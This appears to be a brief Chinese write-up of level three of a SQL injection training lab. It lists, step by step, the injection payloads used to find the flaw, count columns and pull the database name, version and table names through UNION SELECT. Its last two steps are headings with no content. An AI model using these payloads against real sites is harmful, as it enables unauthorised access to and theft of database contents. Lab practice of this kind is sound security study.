今天来搞搞第三关,感觉和之前差不多,就多了一个奇怪的知识

来看看有没有注入点
/?id=1'

有注入点
判断注入点类型
输入/?id=1') and 1=2 --+

3.判断它的字段数
/?id=1') order by 1-++
/?id=1') order by 2-++
/?id=1') order by 3-++
/?id=1') order by 4-++

爆出显示位
/?id=-1') union select 1,2,3 --+

开始判断库名
?id=-1') union select 1,database(),version() --+

判断表名
/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

判断user的列名

爆具体的列里的数据
